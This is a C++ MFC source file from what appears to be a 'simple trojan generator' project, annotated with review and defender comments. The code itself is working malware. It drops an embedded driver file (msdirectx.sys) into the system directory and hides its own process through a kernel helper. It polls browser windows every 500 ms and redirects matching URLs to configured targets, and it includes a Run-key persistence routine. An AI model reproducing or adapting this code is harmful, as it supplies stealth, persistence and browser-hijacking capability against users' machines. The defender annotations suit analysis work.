
📄 procdlg.cpp

📁 一个简单的木马生成器的程序
// ProcDlg.cpp : implementation file
//

#include "stdafx.h"
#include "Proc.h"
#include "ProcDlg.h"
#include <winsvc.h>
#include "HideProcess.h"



#include <atlbase.h>
#include <Mshtml.h>
#include <winuser.h>
#include <comdef.h>


#pragma comment(linker,"/opt:nowin98")

// Configuration block compiled into the binary: three URL substrings to watch
// for (hate1..hate3) and three URLs to navigate to instead (my1..my3).
// SetMyUrl() pairs them by index: a match on hateN triggers Navigate(myN).
// NOTE(review): `finder` is never read in this file. The page describes the
// project as a generator, so it is presumably a marker that lets an external
// tool locate this struct inside the compiled EXE and overwrite the URL
// fields -- confirm against the builder. If so, the constant followed by six
// 256-byte string slots is likely usable as a static signature when triaging
// samples built from this source.
struct MODIFY_DATA 
{
	unsigned int finder;	// fixed marker value, see note above
	char hate1[256];	// substring matched against a browser window's current URL
	char hate2[256];
	char hate3[256];

	char my1[256];		// navigation target used when hate1 matches
	char my2[256];		// navigation target used when hate2 matches
	char my3[256];		// navigation target used when hate3 matches
}modify_data = {
	0xDAFAFDD4,
	"http://www.baidu.com",
	"http://www.baidu.com",
	"http://www.baidu.com",

	"http://www.baidu.com",
	"http://www.baidu.com",
	"http://www.baidu.com",

};

// Extracts a resource embedded in this executable and writes it to disk.
//   resoure_id : numeric ID of the resource
//   type       : resource type name (the caller in this file passes "SYS")
//   filepath   : destination file; created, or truncated if it already exists
// Returns TRUE when FindResource located the resource, FALSE otherwise.
// NOTE(review): the return value says nothing about whether LoadResource or
// the file write succeeded -- TRUE is returned in both failure cases, and
// FreeResource is called even when `handle` is NULL.
// Defender view: this is the drop step. The payload is stored inside the
// EXE's resource section, so the dropped file can be recovered from a sample
// with a resource viewer without running it.
BOOL LoadSource(UINT resoure_id , const char * type , const char * filepath)
{
	// Locate the resource in the current module (NULL = this executable)
	HRSRC hRsrc = ::FindResource( NULL , MAKEINTRESOURCE( resoure_id ) , type );
	
	if( hRsrc )
	{   // Size of the resource in bytes
		DWORD size = ::SizeofResource( NULL , hRsrc );
		// Load the resource into memory
		HGLOBAL  handle = ::LoadResource( NULL , hRsrc );
		// Write it out to the file
		if( handle )
		{   // Get a pointer to the resource bytes
			BYTE *MemPtr = (BYTE *)LockResource( handle ); 

			CFile file;

			// A failed Open is silently skipped; nothing is reported to the caller
			if( file.Open( filepath , CFile::modeCreate | CFile::modeWrite ) )
			{
				file.Write( MemPtr , size );

				file.Close( );
			}
			::UnlockResource( handle );
		}
		::FreeResource( handle );
		return TRUE;
	}
	return FALSE;
}

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CProcDlg dialog

// Constructs the dialog: forwards the dialog template ID and parent window to
// CDialog, clears the ShellWindows smart pointer (it is created later in
// OnInitDialog) and loads the application icon.
CProcDlg::CProcDlg(CWnd* pParent /*=NULL*/)
	: CDialog(CProcDlg::IDD, pParent)
{
	//{{AFX_DATA_INIT(CProcDlg)
		// NOTE: the ClassWizard will add member initialization here
	m_spSHWinds = NULL;
	//}}AFX_DATA_INIT
	// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
	m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

// Dialog data exchange hook. No DDX/DDV entries are registered, so this only
// forwards to the base class; the dialog has no data-bound controls.
void CProcDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CProcDlg)
		// NOTE: the ClassWizard will add DDX and DDV calls here
	//}}AFX_DATA_MAP
}

// Message map: routes WM_PAINT, WM_QUERYDRAGICON and WM_TIMER to OnPaint(),
// OnQueryDragIcon() and OnTimer(). WM_TIMER is the entry that drives the
// program's real behaviour: OnTimer() calls SetMyUrl() on every tick.
BEGIN_MESSAGE_MAP(CProcDlg, CDialog)
	//{{AFX_MSG_MAP(CProcDlg)
	ON_WM_PAINT()
	ON_WM_QUERYDRAGICON()
	ON_WM_TIMER()
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CProcDlg message handlers

// WM_INITDIALOG handler. Beyond the wizard-generated icon setup it:
//   1. writes the embedded "SYS" resource IDR_SYS1 to
//      <system directory>\msdirectx.sys via LoadSource(),
//   2. calls CHideProcess::InitDriver() and then HideProc() with this
//      process's own PID,
//   3. creates a SHDocVw::ShellWindows COM object,
//   4. starts a 500 ms timer (ID 0) whose ticks reach SetMyUrl() via OnTimer().
// Always returns TRUE.
// NOTE(review): CHideProcess is declared in HideProcess.h, which is not shown
// here. Going by the names, it presumably loads the dropped file as a kernel
// driver and uses it to hide this process -- confirm against that header.
// Defender view: a file named msdirectx.sys appearing in the system directory,
// written by a user-mode dialog application, is the most concrete host
// artefact visible in this file. A process-listing discrepancy between
// user-mode tools and a kernel or offline view would be the follow-up check.
BOOL CProcDlg::OnInitDialog()
{
	CDialog::OnInitDialog();

	// Set the icon for this dialog.  The framework does this automatically
	//  when the application's main window is not a dialog
	SetIcon(m_hIcon, TRUE);			// Set big icon
	SetIcon(m_hIcon, FALSE);		// Set small icon

	// Make the window disappear (disabled in this copy)
	//MoveWindow(0,0,0,0,FALSE);
	//SetWindowLong(this->GetSafeHwnd(),GWL_EXSTYLE,WS_EX_TOOLWINDOW|WS_EX_STATICEDGE);
	
	// Register as a startup item (disabled in this copy)
	//SetAutoRun("winsrv.exe");

	// Build "<system directory>\msdirectx.sys" and drop the embedded resource there.
	// NOTE(review): the GetSystemDirectory result is not checked before strcat,
	// and the LoadSource result is ignored.
	char Path[MAX_PATH];
	GetSystemDirectory(Path,MAX_PATH);
	strcat(Path,"\\msdirectx.sys");
	LoadSource(IDR_SYS1,"SYS",Path);

	// Passes this process's own PID to the hiding helper (see note in the header comment)
	CHideProcess p;
	p.InitDriver();
	p.HideProc(GetCurrentProcessId());

	// Initialise COM and create the ShellWindows collection used by SetMyUrl()
	CoInitialize(NULL);
	if (m_spSHWinds == NULL)
	{
		if (m_spSHWinds.CreateInstance(__uuidof(SHDocVw::ShellWindows)) != S_OK)
		{
			// NOTE(review): after this failure path execution still falls
			// through to SetTimer below; there is no early return.
			CoUninitialize();
			EndDialog(1);
		}
	}
	// Start the polling timer: ID 0, 500 ms period, delivered as WM_TIMER
	SetTimer(0,500,NULL);
	return TRUE;  // return TRUE  unless you set the focus to a control
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

void CProcDlg::OnPaint() 
{
	// Anything other than the minimized state is painted by the base class.
	if (!IsIconic())
	{
		CDialog::OnPaint();
		return;
	}

	CPaintDC paintDc(this); // device context for painting

	SendMessage(WM_ICONERASEBKGND, (WPARAM) paintDc.GetSafeHdc(), 0);

	// Work out where the icon goes so that it sits centred in the client area.
	CRect clientRect;
	GetClientRect(&clientRect);
	const int iconWidth = GetSystemMetrics(SM_CXICON);
	const int iconHeight = GetSystemMetrics(SM_CYICON);
	const int left = (clientRect.Width() - iconWidth + 1) / 2;
	const int top = (clientRect.Height() - iconHeight + 1) / 2;

	paintDc.DrawIcon(left, top, m_hIcon);
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CProcDlg::OnQueryDragIcon()
{
	// The dialog icon doubles as the drag cursor; only the handle type changes.
	return reinterpret_cast<HCURSOR>(m_hIcon);
}

// Timer-driven URL redirection, called from OnTimer() on every tick.
// Walks every entry in the ShellWindows collection and, when a window's
// current URL contains one of modify_data.hate1..hate3 as a substring,
// navigates that window to the corresponding modify_data.my1..my3.
// NOTE(review): the original comments speak of Internet Explorer instances,
// but nothing here checks which application owns a window; every entry that
// yields an IWebBrowser2 interface is processed.
// NOTE(review): the compiled-in defaults set every hateN and myN to the same
// URL, so a matching window would be re-navigated on each tick. Presumably
// the values are replaced before use -- confirm.
// Defender view: a background process that instantiates ShellWindows and
// calls IWebBrowser2::Navigate on other windows on a sub-second timer is not
// normal application behaviour. Unexplained redirects away from specific
// sites are the user-visible symptom.
void CProcDlg::SetMyUrl()// called each time the timer fires
{
	// Non-null only if OnInitDialog() managed to create the ShellWindows object
	if (m_spSHWinds)
	{
		// Number of shell/browser windows currently registered
		int n = m_spSHWinds->GetCount();
		// Visit each window in turn
		for (int i = 0; i < n; i++)
		{
			// Fetch entry i and query it for the IWebBrowser2 interface
			_variant_t v = (long)i;
			IDispatchPtr spDisp = m_spSHWinds->Item(v);
			SHDocVw::IWebBrowser2Ptr spBrowser(spDisp);
			ASSERT(spBrowser != NULL);
			if (spBrowser)
			{
				// URL the window is currently showing; _bstr_t is a string
				// wrapper class and is compared below as a narrow (char) string
				_bstr_t bsURL=spBrowser->GetLocationURL();
				// Plain C substring search: does the URL contain the first watched string?
				if (strstr(bsURL,modify_data.hate1) != NULL)
				{
					// Watched URL found: send this window to the
					// replacement URL configured for slot 1.
					spBrowser->Navigate(modify_data.my1);
				}
				// The three checks are independent (not else-if), so one URL
				// can trigger more than one Navigate call in a single pass.
				if (strstr(bsURL,modify_data.hate2) != NULL)
				{
					// Same redirection for slot 2.
					spBrowser->Navigate(modify_data.my2);
				}
				if (strstr(bsURL,modify_data.hate3) != NULL)
				{
					// Same redirection for slot 3.
					spBrowser->Navigate(modify_data.my3);
				}
			}
		}
	}
}


// WM_TIMER handler. OnInitDialog() starts timer 0 with a 500 ms period, so
// this runs roughly twice a second and performs one redirection pass each
// time. nIDEvent is not inspected; any timer delivered to the dialog
// triggers the pass.
void CProcDlg::OnTimer(UINT nIDEvent) 
{
	SetMyUrl();
	// DoDataExchange() registers no DDX entries, so this transfers no fields
	UpdateData(FALSE);
	CDialog::OnTimer(nIDEvent);
}

// Registers the running executable under the machine-wide Run key so that it
// is started at logon.
//   RunName : name of the registry value created under
//             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
// The value data is the full path of the current module.
// The only call site visible in this file (in OnInitDialog) is commented out.
// NOTE(review): the key is opened with KEY_ALL_ACCESS on HKLM, which normally
// needs administrative rights. Failures of RegOpenKeyEx and RegSetValueEx are
// silently ignored.
// NOTE(review): cbData is strlen(MyPath), which leaves out the terminating
// NUL that REG_SZ data is documented to include.
// Defender view: new values under this key that point at unfamiliar binaries
// are a standard persistence indicator and worth baselining.
void CProcDlg::SetAutoRun(char *RunName)
{
	// Full path of the running executable; becomes the value data
	char MyPath[MAX_PATH]={0};
	GetModuleFileName(NULL,MyPath,MAX_PATH);

	char SubKey[MAX_PATH]={0};
	strcpy(SubKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
	
	HKEY hKey;
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
	{
		RegSetValueEx(hKey,RunName,0L,REG_SZ,(CONST BYTE *)MyPath,strlen(MyPath));
		RegCloseKey(hKey);
	}
}
